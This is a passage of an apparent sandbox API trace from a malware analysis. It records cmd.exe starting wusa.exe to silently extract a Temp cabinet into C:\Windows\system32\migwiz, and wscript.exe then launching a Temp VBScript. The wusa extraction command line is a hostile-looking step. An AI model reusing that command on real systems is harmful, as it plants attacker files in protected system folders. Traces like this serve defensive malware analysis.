(HeapHandle=0x380000, Flags=0x0, MemoryPointer=0x381320) returned 0x64 [0136.466] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.466] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.466] GetProcessHeap () returned 0x380000 [0136.466] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x126) returned 0x3813a0 [0136.466] GetProcessHeap () returned 0x380000 [0136.466] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x23c) returned 0x3814d0 [0136.472] GetProcessHeap () returned 0x380000 [0136.472] RtlReAllocateHeap (Heap=0x380000, Flags=0x0, Ptr=0x3814d0, Size=0x128) returned 0x3814d0 [0136.472] GetProcessHeap () returned 0x380000 [0136.472] RtlSizeHeap (HeapHandle=0x380000, Flags=0x0, MemoryPointer=0x3814d0) returned 0x128 [0136.472] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.472] GetProcessHeap () returned 0x380000 [0136.472] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xe8) returned 0x381610 [0136.472] GetProcessHeap () returned 0x380000 [0136.472] RtlReAllocateHeap (Heap=0x380000, Flags=0x0, Ptr=0x381610, Size=0x7e) returned 0x381610 [0136.472] GetProcessHeap () returned 0x380000 [0136.472] RtlSizeHeap (HeapHandle=0x380000, Flags=0x0, MemoryPointer=0x381610) returned 0x7e [0136.474] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.474] FindFirstFileExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wusa.*", fInfoLevelId=0x1, lpFindFileData=0x20ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ea70) returned 0xffffffffffffffff [0136.474] GetLastError () returned 0x2 [0136.474] FindFirstFileExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wusa", fInfoLevelId=0x1, lpFindFileData=0x20ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ea70) returned 0xffffffffffffffff [0136.474] GetLastError () returned 0x2 [0136.474] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.474] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wusa.*", fInfoLevelId=0x1, lpFindFileData=0x20ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ea70) returned 0x39a040 [0136.474] GetProcessHeap () returned 0x380000 [0136.474] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x0, Size=0x28) returned 0x394750 [0136.474] FindClose (in: hFindFile=0x39a040 | out: hFindFile=0x39a040) returned 1 [0136.475] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wusa.COM", fInfoLevelId=0x1, lpFindFileData=0x20ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ea70) returned 0xffffffffffffffff [0136.475] GetLastError () returned 0x2 [0136.475] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wusa.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ea70) returned 0x39a040 [0136.475] GetProcessHeap () returned 0x380000 [0136.475] RtlReAllocateHeap (Heap=0x380000, Flags=0x0, Ptr=0x394750, Size=0x8) returned 0x398a60 [0136.475] FindClose (in: hFindFile=0x39a040 | out: hFindFile=0x39a040) returned 1 [0136.475] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.475] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.475] GetConsoleTitleW (in: lpConsoleTitle=0x20efc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.475] InitializeProcThreadAttributeList (in: lpAttributeList=0x20ed78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20ed38 | out: lpAttributeList=0x20ed78, lpSize=0x20ed38) returned 1 [0136.475] UpdateProcThreadAttribute (in: lpAttributeList=0x20ed78, dwFlags=0x0, Attribute=0x60001, lpValue=0x20ed28, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20ed78, lpPreviousValue=0x0) returned 1 [0136.475] GetStartupInfoW (in: lpStartupInfo=0x20ee90 | out: lpStartupInfo=0x20ee90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0136.475] GetProcessHeap () returned 0x380000 [0136.475] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x20) returned 0x394750 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.476] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.477] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.477] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.477] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0136.477] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0136.477] GetProcessHeap () returned 0x380000 [0136.477] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x394750 | out: hHeap=0x380000) returned 1 [0136.477] GetProcessHeap () returned 0x380000 [0136.477] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x12) returned 0x39a040 [0136.477] lstrcmpW (lpString1="\\wusa.exe", lpString2="\\XCOPY.EXE") returned -1 [0136.478] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wusa.exe", lpCommandLine="wusa C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\64.cab /quiet /extract:C:\\Windows\\system32\\migwiz\\ ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpStartupInfo=0x20edb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wusa C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\64.cab /quiet /extract:C:\\Windows\\system32\\migwiz\\ ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20ed60 | out: lpCommandLine="wusa C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\64.cab /quiet /extract:C:\\Windows\\system32\\migwiz\\ ", lpProcessInformation=0x20ed60*(hProcess=0x54, hThread=0x50, dwProcessId=0xb3c, dwThreadId=0xb40)) returned 1 [0138.281] CloseHandle (hObject=0x50) returned 1 [0138.281] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0138.281] GetProcessHeap () returned 0x380000 [0138.282] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39c390 | out: hHeap=0x380000) returned 1 [0138.282] GetEnvironmentStringsW () returned 0x39ad90* [0138.282] GetProcessHeap () returned 0x380000 [0138.282] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xae6) returned 0x39b880 [0138.282] FreeEnvironmentStringsW (penv=0x39ad90) returned 1 [0138.282] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0142.665] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x20eca8 | out: lpExitCode=0x20eca8*=0x0) returned 1 [0142.665] CloseHandle (hObject=0x54) returned 1 [0142.665] _vsnwprintf (in: _Buffer=0x20ef18, _BufferCount=0x13, _Format="%08X", _ArgList=0x20ecb8 | out: _Buffer="00000000") returned 8 [0142.665] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0142.665] GetProcessHeap () returned 0x380000 [0142.665] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39b880 | out: hHeap=0x380000) returned 1 [0142.665] GetEnvironmentStringsW () returned 0x39ad90* [0142.665] GetProcessHeap () returned 0x380000 [0142.665] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xb0c) returned 0x39b8b0 [0142.665] FreeEnvironmentStringsW (penv=0x39ad90) returned 1 [0142.665] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0142.665] GetProcessHeap () returned 0x380000 [0142.665] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39b8b0 | out: hHeap=0x380000) returned 1 [0142.665] GetEnvironmentStringsW () returned 0x39ad90* [0142.666] GetProcessHeap () returned 0x380000 [0142.666] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xb0c) returned 0x39b8b0 [0142.666] FreeEnvironmentStringsW (penv=0x39ad90) returned 1 [0142.666] GetProcessHeap () returned 0x380000 [0142.666] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39a040 | out: hHeap=0x380000) returned 1 [0142.666] DeleteProcThreadAttributeList (in: lpAttributeList=0x20ed78 | out: lpAttributeList=0x20ed78) [0142.666] GetConsoleTitleW (in: lpConsoleTitle=0x20f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.666] GetProcessHeap () returned 0x380000 [0142.666] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x14) returned 0x39a040 [0142.666] GetProcessHeap () returned 0x380000 [0142.666] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1a) returned 0x394780 [0142.667] exit (_Code=0) Process: id = "3" image_name = "wusa.exe" filename = "c:\\windows\\system32\\wusa.exe" page_root = "0x3157d000" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xb24" cmd_line = "wusa C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\64.cab /quiet /extract:C:\\Windows\\system32\\migwiz\\ " cur_dir = "C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5 os_tid = 0xb40 Thread: id = 6 os_tid = 0xb4c Thread: id = 7 os_tid = 0xb50 Process: id = "4" image_name = "wscript.exe" filename = "c:\\windows\\system32\\wscript.exe" page_root = "0x3016f000" os_pid = "0xb60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb0c" cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 10 os_tid = 0xb64 [0145.854] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afcc0 | out: lpSystemTimeAsFileTime=0x1afcc0*(dwLowDateTime=0xa494410, dwHighDateTime=0x1d509d7)) [0145.854] GetCurrentProcessId () returned 0xb60 [0145.854] GetCurrentThreadId () returned 0xb64 [0145.854] GetTickCount () returned 0x2f9b9 [0145.854] QueryPerformanceCounter (in: lpPerformanceCount=0x1afcc8 | out: lpPerformanceCount=0x1afcc8*=24707480401) returned 1 [0145.854] GetStartupInfoA (in: lpStartupInfo=0x1afce0 | out: lpStartupInfo=0x1afce0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) [0145.855] GetModuleHandleA (lpModuleName=0x0) returned 0xff290000 [0145.856] GetModuleHandleA (lpModuleName=0x0) returned 0xff290000 [0145.856] GetVersionExA (in: lpVersionInformation=0x1afc00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x391eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1afc00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0145.856] GetUserDefaultLCID () returned 0x409 [0145.856] CoInitialize (pvReserved=0x0) returned 0x0 [0146.495] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs\" " [0146.495] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs\" ") returned 81 [0146.495] ??2@YAPEAX_K@Z () returned 0x3157b0 [0146.495] ??2@YAPEAX_K@Z () returned 0x1bdf90 [0146.496] GetCurrentThreadId () returned 0xb64 [0146.496] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af948 | out: phkResult=0x1af948*=0x7c) returned 0x0 [0146.496] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af940 | out: phkResult=0x1af940*=0x80) returned 0x0 [0146.496] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1aec48, lpData=0x1af050, lpcbData=0x1aec40*=0x400 | out: lpType=0x1aec48*=0x0, lpData=0x1af050*=0x67, lpcbData=0x1aec40*=0x400) returned 0x2 [0146.496] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x1aec48, lpData=0x1af050, lpcbData=0x1aec40*=0x400 | out: lpType=0x1aec48*=0x0, lpData=0x1af050*=0x67, lpcbData=0x1aec40*=0x400) returned 0x2 [0146.496] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x1aec48, lpData=0x1af050, lpcbData=0x1aec40*=0x400 | out: lpType=0x1aec48*=0x0, lpData=0x1af050*=0x67, lpcbData=0x1aec40*=0x400) returned 0x2 [0146.496] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0146.509] RegCloseKey (hKey=0x80) returned 0x0 [0146.509] RegCloseKey (hKey=0x7c) returned 0x0 [0146.509] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af660 | out: phkResult=0x1af660*=0x7c) returned 0x0 [0146.509] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af658 | out: phkResult=0x1af658*=0x80) returned 0x0 [0146.509] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1ae968, lpData=0x1aed70, lpcbData=0x1ae960*=0x400 | out: lpType=0x1ae968*=0x0, lpData=0x1aed70*=0x0, lpcbData=0x1ae960*=0x400) returned 0x2 [0146.509] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x1ae968, lpData=0x1aed70, lpcbData=0x1ae960*=0x400 | out: lpType=0x1ae968*=0x0, lpData=0x1aed70*=0x0, lpcbData=0x1ae960*=0x400) returned 0x2 [0146.509] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x1ae968, lpData=0x1aed70, lpcbData=0x1ae960*=0x400 | out: lpType=0x1ae968*=0x0, lpData=0x1aed70*=0x0, lpcbData=0x1ae960*=0x400) returned 0x2 [0146.509] RegCloseKey (hKey=0x80) returned 0x0 [0146.509] RegCloseKey (hKey=0x7c) returned 0x0 [0146.510] GetACP () returned 0x4e4 [0146.510] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e30000 [0146.510] GetProcAddress (hModule=0x76e30000, lpProcName="HeapSetInformation") returned 0x76e4c4a0 [0146.510] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.510] FreeLibrary (hLibModule=0x76e30000) returned 1 [0146.510] ??2@YAPEAX_K@Z () returned 0x315f30 [0146.514] CoRegisterMessageFilter (in: lpMessageFilter=0x315f30, lplpMessageFilter=0x315f40 | out: lplpMessageFilter=0x315f40*=0x0) returned 0x0 [0146.514] GetModuleFileNameW (in: hModule=0xff290000, lpFilename=0x1af9a0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f [0146.514] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x1af2f0 | out: lpdwHandle=0x1af2f0) returned 0x704 [0146.515] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x1aebe0 | out: lpData=0x1aebe0) returned 1 [0146.515] VerQueryValueW (in: pBlock=0x1aebe0, lpSubBlock="\\", lplpBuffer=0x1af2f8, puLen=0x1af2f4 | out: lplpBuffer=0x1af2f8*=0x1aec08, puLen=0x1af2f4) returned 1 [0146.515] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af348 | out: phkResult=0x1af348*=0x7c) returned 0x0 [0146.515] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1ae698, lpData=0x1aeaa0, lpcbData=0x1ae690*=0x400 | out: lpType=0x1ae698*=0x0, lpData=0x1aeaa0*=0x0, lpcbData=0x1ae690*=0x400) returned 0x2 [0146.515] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af300 | out: phkResult=0x1af300*=0x80) returned 0x0 [0146.515] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x1af2c4, lpData=0x1af340, lpcbData=0x1af2c0*=0x4 | out: lpType=0x1af2c4*=0x0, lpData=0x1af340*=0x70, lpcbData=0x1af2c0*=0x4) returned 0x2 [0146.515] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x1ae698, lpData=0x1aeaa0, lpcbData=0x1ae690*=0x400 | out: lpType=0x1ae698*=0x0, lpData=0x1aeaa0*=0x0, lpcbData=0x1ae690*=0x400) returned 0x2 [0146.515] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x1af2c4, lpData=0x1af340, lpcbData=0x1af2c0*=0x4 | out: lpType=0x1af2c4*=0x0, lpData=0x1af340*=0x70, lpcbData=0x1af2c0*=0x4) returned 0x2 [0146.516] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x1ae698, lpData=0x1aeaa0, lpcbData=0x1ae690*=0x400 | out: lpType=0x1ae698*=0x1, lpData="1", lpcbData=0x1ae690*=0x4) returned 0x0 [0146.516] lstrlenW (lpString="1") returned 1 [0146.516] lstrlenW (lpString="0") returned 1 [0146.516] lstrlenW (lpString="1") returned 1 [0146.516] lstrlenW (lpString="no") returned 2 [0146.516] lstrlenW (lpString="1") returned 1 [0146.516] lstrlenW (lpString="false") returned 5 [0146.516] RegCloseKey (hKey=0x80) returned 0x0 [0146.516] RegCloseKey (hKey=0x7c) returned 0x0 [0146.516] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x1af348, lpdwDisposition=0x0 | out: phkResult=0x1af348*=0x7c, lpdwDisposition=0x0) returned 0x0 [0146.516] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x1af2e4, lpData=0x1af340, lpcbData=0x1af2e0*=0x4 | out: lpType=0x1af2e4*=0x0, lpData=0x1af340*=0x70, lpcbData=0x1af2e0*=0x4) returned 0x2 [0146.516] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x1ae6b8, lpData=0x1aeac0, lpcbData=0x1ae6b0*=0x400 | out: lpType=0x1ae6b8*=0x1, lpData="1", lpcbData=0x1ae6b0*=0x4) returned 0x0 [0146.516] lstrlenW (lpString="1") returned 1 [0146.516] lstrlenW (lpString="0") returned 1 [0146.516] lstrlenW (lpString="1") returned 1 [0146.516] lstrlenW (lpString="no") returned 2 [0146.516] lstrlenW (lpString="1") returned 1 [0146.516] lstrlenW (lpString="false") returned 5 [0146.516] RegCloseKey (hKey=0x7c) returned 0x0 [0146.517] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x1af348, lpdwDisposition=0x0 | out: phkResult=0x1af348*=0x7c, lpdwDisposition=0x0) returned 0x0 [0146.517] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x1af2e4, lpData=0x1af340, lpcbData=0x1af2e0*=0x4 | out: lpType=0x1af2e4*=0x0, lpData=0x1af340*=0x70, lpcbData=0x1af2e0*=0x4) returned 0x2 [0146.517] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x1ae6b8, lpData=0x1aeac0, lpcbData=0x1ae6b0*=0x400 | out: lpType=0x1ae6b8*=0x0, lpData=0x1aeac0*=0x31, lpcbData=0x1ae6b0*=0x400) returned 0x2 [0146.517] RegCloseKey (hKey=0x7c) returned 0x0 [0146.517] lstrlenW (lpString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\888.vbs") returned 44 [0146.517] lstrlenW (lpString="vbs") returned 3 [0146.517] lstrlenW (lpString="WSH") returned 3 [0146.517] ??2@YAPEAX_K@Z () returned 0x315860 [0146.517] LoadStringW (in: hInstance=0xff290000, uID=0x9c5, lpBuffer=0x1addb0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0146.518] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x1aedf0*=0x0 | out: pptlib=0x1aedf0*=0x3bd020) returned 0x0 [0146.522] ITypeLib:GetTypeInfoType (in: This=0x3bd020, index=0xff2958f0, pTKind=0x1aedd8 | out: pTKind=0x1aedd8*=3925000) returned 0x0 [0146.907] ??2@YAPEAX_K@Z () returned 0x3158f0 [0146.907] ??2@YAPEAX_K@Z () returned 0x315f60 [0146.907] ??2@YAPEAX_K@Z () returned 0x315990 [0146.907] ITypeLib:GetTypeInfoType (in: This=0x3bd020, index=0xff295950, pTKind=0x1aedd8 | out: pTKind=0x1aedd8*=3925176) returned 0x0 [0146.907] ITypeLib:GetTypeInfoType (in: This=0x3bd020, index=0xff295960, pTKind=0x1aedd8 | out: pTKind=0x1aedd8*=3925352) returned 0x0 [0146.907] ITypeLib:GetTypeInfoType (in: This=0x3bd020, index=0xff295910, pTKind=0x1aedd8 | out: pTKind=0x1aedd8*=3925528) returned 0x0 [0146.907] IUnknown:Release (This=0x3bd020) returned 0x4 [0146.907] ??2@YAPEAX_K@Z () returned 0x3159f0 [0146.908] GetCurrentThreadId () returned 0xb64 [0146.908] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc [0146.909] 